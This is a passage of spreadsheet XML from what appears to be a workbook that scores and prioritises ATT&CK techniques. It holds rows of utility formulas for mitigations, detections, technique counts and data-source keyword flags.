      <c r="T148" s="57" t="s">
        <v>536</v>
      </c>
      <c r="U148" s="57">
        <v>18</v>
      </c>
      <c r="V148" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.26666652380952383</v>
      </c>
      <c r="W148" s="37">
        <v>26</v>
      </c>
      <c r="X148" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Y148" s="37">
        <v>0.47272700000000001</v>
      </c>
      <c r="Z148" s="37">
        <v>4</v>
      </c>
      <c r="AA148" s="37">
        <v>0.04</v>
      </c>
      <c r="AB148" s="37">
        <v>0.04</v>
      </c>
      <c r="AC148" s="37"/>
      <c r="AD148" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE148" s="37" t="str" cm="1">
        <f t="array" ref="AE148">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD148)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF148" s="37">
        <v>144</v>
      </c>
      <c r="AG148" s="37" t="str" cm="1">
        <f t="array" ref="AG148">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD148)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH148" s="37">
        <v>144</v>
      </c>
      <c r="AI148" s="37" t="str" cm="1">
        <f t="array" ref="AI148">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD148)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ148" s="37">
        <v>144</v>
      </c>
      <c r="AK148" s="37" t="str" cm="1">
        <f t="array" ref="AK148">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD148)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL148" s="37">
        <v>144</v>
      </c>
      <c r="AM148" s="37" t="str" cm="1">
        <f t="array" ref="AM148">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD148)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN148" s="37">
        <v>0</v>
      </c>
      <c r="AO148" s="37">
        <v>0</v>
      </c>
      <c r="AP148" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ148" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>70.522194746031744</v>
      </c>
      <c r="AR148" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS148" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT148" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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49" spans="1:47" ht="34">
      <c r="A149" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B149" s="37">
        <f t="shared" si="2"/>
        <v>500.34187266666669</v>
      </c>
      <c r="C149" s="37" t="s">
        <v>537</v>
      </c>
      <c r="D149" s="50" t="s">
        <v>538</v>
      </c>
      <c r="E149" s="37"/>
      <c r="F149" s="37">
        <v>1</v>
      </c>
      <c r="G149" s="37">
        <v>6</v>
      </c>
      <c r="H149" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I149" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J149" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K149" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.6</v>
      </c>
      <c r="L149" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.6</v>
      </c>
      <c r="M149" s="37">
        <v>1.65E-3</v>
      </c>
      <c r="N149" s="56">
        <v>0</v>
      </c>
      <c r="O149" s="56">
        <v>0</v>
      </c>
      <c r="P149" s="56">
        <v>1</v>
      </c>
      <c r="Q149" s="56">
        <v>0</v>
      </c>
      <c r="R149" s="57" t="s">
        <v>539</v>
      </c>
      <c r="S149" s="57">
        <v>29</v>
      </c>
      <c r="T149" s="57" t="s">
        <v>540</v>
      </c>
      <c r="U149" s="57">
        <v>24</v>
      </c>
      <c r="V149" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.50952361904761911</v>
      </c>
      <c r="W149" s="37">
        <v>53</v>
      </c>
      <c r="X149" s="37">
        <v>0.96363600000000005</v>
      </c>
      <c r="Y149" s="37">
        <v>0.96363600000000005</v>
      </c>
      <c r="Z149" s="37">
        <v>1</v>
      </c>
      <c r="AA149" s="37">
        <v>0.01</v>
      </c>
      <c r="AB149" s="37">
        <v>0.01</v>
      </c>
      <c r="AC149" s="37"/>
      <c r="AD149" s="50" t="s">
        <v>541</v>
      </c>
      <c r="AE149" s="37" t="str" cm="1">
        <f t="array" ref="AE149">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD149)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF149" s="37">
        <v>145</v>
      </c>
      <c r="AG149" s="37" t="str" cm="1">
        <f t="array" ref="AG149">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD149)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH149" s="37">
        <v>145</v>
      </c>
      <c r="AI149" s="37" t="str" cm="1">
        <f t="array" ref="AI149">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD149)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ149" s="37">
        <v>145</v>
      </c>
      <c r="AK149" s="37" t="str" cm="1">
        <f t="array" ref="AK149">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD149)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL149" s="37">
        <v>145</v>
      </c>
      <c r="AM149" s="37" t="str" cm="1">
        <f t="array" ref="AM149">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD149)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN149" s="37">
        <v>0</v>
      </c>
      <c r="AO149" s="37">
        <v>0</v>
      </c>
      <c r="AP149" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ149" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>166.78062422222223</v>
      </c>
      <c r="AR149" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS149" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT149" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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50" spans="1:47" ht="51">
      <c r="A150" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B150" s="37">
        <f t="shared" si="2"/>
        <v>691.28249357142863</v>
      </c>
      <c r="C150" s="37" t="s">
        <v>542</v>
      </c>
      <c r="D150" s="50" t="s">
        <v>543</v>
      </c>
      <c r="E150" s="37"/>
      <c r="F150" s="37">
        <v>8</v>
      </c>
      <c r="G150" s="37">
        <v>4</v>
      </c>
      <c r="H150" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.60000000000000009</v>
      </c>
      <c r="I150" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.8</v>
      </c>
      <c r="J150" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.8</v>
      </c>
      <c r="K150" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.4</v>
      </c>
      <c r="L150" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="M150" s="37">
        <v>0.105489</v>
      </c>
      <c r="N150" s="56">
        <v>0</v>
      </c>
      <c r="O150" s="56">
        <v>42</v>
      </c>
      <c r="P150" s="56">
        <v>40</v>
      </c>
      <c r="Q150" s="56">
        <v>51</v>
      </c>
      <c r="R150" s="57"/>
      <c r="S150" s="57">
        <v>0</v>
      </c>
      <c r="T150" s="57"/>
      <c r="U150" s="57">
        <v>0</v>
      </c>
      <c r="V150" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.47619047619047616</v>
      </c>
      <c r="W150" s="37">
        <v>0</v>
      </c>
      <c r="X150" s="37">
        <v>0</v>
      </c>
      <c r="Y150" s="37">
        <v>0</v>
      </c>
      <c r="Z150" s="37">
        <v>133</v>
      </c>
      <c r="AA150" s="37">
        <v>1.33</v>
      </c>
      <c r="AB150" s="37">
        <v>1</v>
      </c>
      <c r="AC150" s="37"/>
      <c r="AD150" s="50" t="s">
        <v>544</v>
      </c>
      <c r="AE150" s="37" t="str" cm="1">
        <f t="array" ref="AE150">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD150)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF150" s="37">
        <v>146</v>
      </c>
      <c r="AG150" s="37" t="str" cm="1">
        <f t="array" ref="AG150">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD150)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH150" s="37">
        <v>146</v>
      </c>
      <c r="AI150" s="37" t="str" cm="1">
        <f t="array" ref="AI150">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD150)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ150" s="37">
        <v>146</v>
      </c>
      <c r="AK150" s="37" t="str" cm="1">
        <f t="array" ref="AK150">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD150)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL150" s="37">
        <v>146</v>
      </c>
      <c r="AM150" s="37" t="str" cm="1">
        <f t="array" ref="AM150">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD150)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN150" s="37">
        <v>0</v>
      </c>
      <c r="AO150" s="37">
        <v>0</v>
      </c>
      <c r="AP150" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ150" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>230.42749785714287</v>
      </c>
      <c r="AR150" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS150" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT150" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU15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51" spans="1:47" ht="51">
      <c r="A151" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B151" s="37">
        <f t="shared" si="2"/>
        <v>70.11904761904762</v>
      </c>
      <c r="C151" s="37" t="s">
        <v>545</v>
      </c>
      <c r="D151" s="50" t="s">
        <v>543</v>
      </c>
      <c r="E151" s="37" t="s">
        <v>546</v>
      </c>
      <c r="F151" s="37">
        <v>1</v>
      </c>
      <c r="G151" s="37">
        <v>1</v>
      </c>
      <c r="H151" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I151" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J151" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K151" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L151" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M151" s="37">
        <v>0</v>
      </c>
      <c r="N151" s="56">
        <v>0</v>
      </c>
      <c r="O151" s="56">
        <v>4</v>
      </c>
      <c r="P151" s="56">
        <v>0</v>
      </c>
      <c r="Q151" s="56">
        <v>0</v>
      </c>
      <c r="R151" s="57"/>
      <c r="S151" s="57">
        <v>0</v>
      </c>
      <c r="T151" s="57"/>
      <c r="U151" s="57">
        <v>0</v>
      </c>
      <c r="V151" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W151" s="37">
        <v>0</v>
      </c>
      <c r="X151" s="37">
        <v>0</v>
      </c>
      <c r="Y151" s="37">
        <v>0</v>
      </c>
      <c r="Z151" s="37">
        <v>4</v>
      </c>
      <c r="AA151" s="37">
        <v>0.04</v>
      </c>
      <c r="AB151" s="37">
        <v>0.04</v>
      </c>
      <c r="AC151" s="37"/>
      <c r="AD151" s="50" t="s">
        <v>544</v>
      </c>
      <c r="AE151" s="37" t="str" cm="1">
        <f t="array" ref="AE151">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD151)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF151" s="37">
        <v>147</v>
      </c>
      <c r="AG151" s="37" t="str" cm="1">
        <f t="array" ref="AG151">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD151)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH151" s="37">
        <v>147</v>
      </c>
      <c r="AI151" s="37" t="str" cm="1">
        <f t="array" ref="AI151">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD151)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ151" s="37">
        <v>147</v>
      </c>
      <c r="AK151" s="37" t="str" cm="1">
        <f t="array" ref="AK151">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD151)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL151" s="37">
        <v>147</v>
      </c>
      <c r="AM151" s="37" t="str" cm="1">
        <f t="array" ref="AM151">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD151)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN151" s="37">
        <v>0</v>
      </c>
      <c r="AO151" s="37">
        <v>0</v>
      </c>
      <c r="AP151" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ151" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>23.373015873015873</v>
      </c>
      <c r="AR151" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS151" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT151" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU15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52" spans="1:47" ht="34">
      <c r="A152" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B152" s="37">
        <f t="shared" si="2"/>
        <v>62.123809523809527</v>
      </c>
      <c r="C152" s="37" t="s">
        <v>547</v>
      </c>
      <c r="D152" s="50" t="s">
        <v>543</v>
      </c>
      <c r="E152" s="37" t="s">
        <v>548</v>
      </c>
      <c r="F152" s="37">
        <v>1</v>
      </c>
      <c r="G152" s="37">
        <v>1</v>
      </c>
      <c r="H152" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I152" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J152" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K152" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L152" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M152" s="37">
        <v>0</v>
      </c>
      <c r="N152" s="56">
        <v>0</v>
      </c>
      <c r="O152" s="56">
        <v>0</v>
      </c>
      <c r="P152" s="56">
        <v>1</v>
      </c>
      <c r="Q152" s="56">
        <v>0</v>
      </c>
      <c r="R152" s="57"/>
      <c r="S152" s="57">
        <v>0</v>
      </c>
      <c r="T152" s="57"/>
      <c r="U152" s="57">
        <v>0</v>
      </c>
      <c r="V152" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W152" s="37">
        <v>0</v>
      </c>
      <c r="X152" s="37">
        <v>0</v>
      </c>
      <c r="Y152" s="37">
        <v>0</v>
      </c>
      <c r="Z152" s="37">
        <v>1</v>
      </c>
      <c r="AA152" s="37">
        <v>0.01</v>
      </c>
      <c r="AB152" s="37">
        <v>0.01</v>
      </c>
      <c r="AC152" s="37"/>
      <c r="AD152" s="50" t="s">
        <v>549</v>
      </c>
      <c r="AE152" s="37" t="str" cm="1">
        <f t="array" ref="AE152">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD152)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF152" s="37">
        <v>148</v>
      </c>
      <c r="AG152" s="37" t="str" cm="1">
        <f t="array" ref="AG152">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD152)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH152" s="37">
        <v>148</v>
      </c>
      <c r="AI152" s="37" t="str" cm="1">
        <f t="array" ref="AI152">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD152)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ152" s="37">
        <v>148</v>
      </c>
      <c r="AK152" s="37" t="str" cm="1">
        <f t="array" ref="AK152">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD152)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL152" s="37">
        <v>148</v>
      </c>
      <c r="AM152" s="37" t="str" cm="1">
        <f t="array" ref="AM152">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD152)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN152" s="37">
        <v>0</v>
      </c>
      <c r="AO152" s="37">
        <v>0</v>
      </c>
      <c r="AP152" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ152" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>20.707936507936509</v>
      </c>
      <c r="AR152" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS152" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT152" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU15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53" spans="1:47" ht="51">
      <c r="A153" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B153" s="37">
        <f t="shared" si="2"/>
        <v>810.56068785714285</v>
      </c>
      <c r="C153" s="37" t="s">
        <v>550</v>
      </c>
      <c r="D153" s="50" t="s">
        <v>551</v>
      </c>
      <c r="E153" s="37"/>
      <c r="F153" s="37">
        <v>6</v>
      </c>
      <c r="G153" s="37">
        <v>5</v>
      </c>
      <c r="H153" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.55000000000000004</v>
      </c>
      <c r="I153" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.6</v>
      </c>
      <c r="J153" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.6</v>
      </c>
      <c r="K153" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L153" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M153" s="37">
        <v>7.7229999999999998E-3</v>
      </c>
      <c r="N153" s="56">
        <v>0</v>
      </c>
      <c r="O153" s="56">
        <v>42</v>
      </c>
      <c r="P153" s="56">
        <v>40</v>
      </c>
      <c r="Q153" s="56">
        <v>51</v>
      </c>
      <c r="R153" s="57" t="s">
        <v>552</v>
      </c>
      <c r="S153" s="57">
        <v>11</v>
      </c>
      <c r="T153" s="57" t="s">
        <v>553</v>
      </c>
      <c r="U153" s="57">
        <v>23</v>
      </c>
      <c r="V153" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.80000009523809523</v>
      </c>
      <c r="W153" s="37">
        <v>34</v>
      </c>
      <c r="X153" s="37">
        <v>0.61818200000000001</v>
      </c>
      <c r="Y153" s="37">
        <v>0.61818200000000001</v>
      </c>
      <c r="Z153" s="37">
        <v>133</v>
      </c>
      <c r="AA153" s="37">
        <v>1.33</v>
      </c>
      <c r="AB153" s="37">
        <v>1</v>
      </c>
      <c r="AC153" s="37"/>
      <c r="AD153" s="50" t="s">
        <v>554</v>
      </c>
      <c r="AE153" s="37" t="str" cm="1">
        <f t="array" ref="AE153">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD153)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF153" s="37">
        <v>149</v>
      </c>
      <c r="AG153" s="37" t="str" cm="1">
        <f t="array" ref="AG153">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD153)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH153" s="37">
        <v>149</v>
      </c>
      <c r="AI153" s="37" t="str" cm="1">
        <f t="array" ref="AI153">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD153)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ153" s="37">
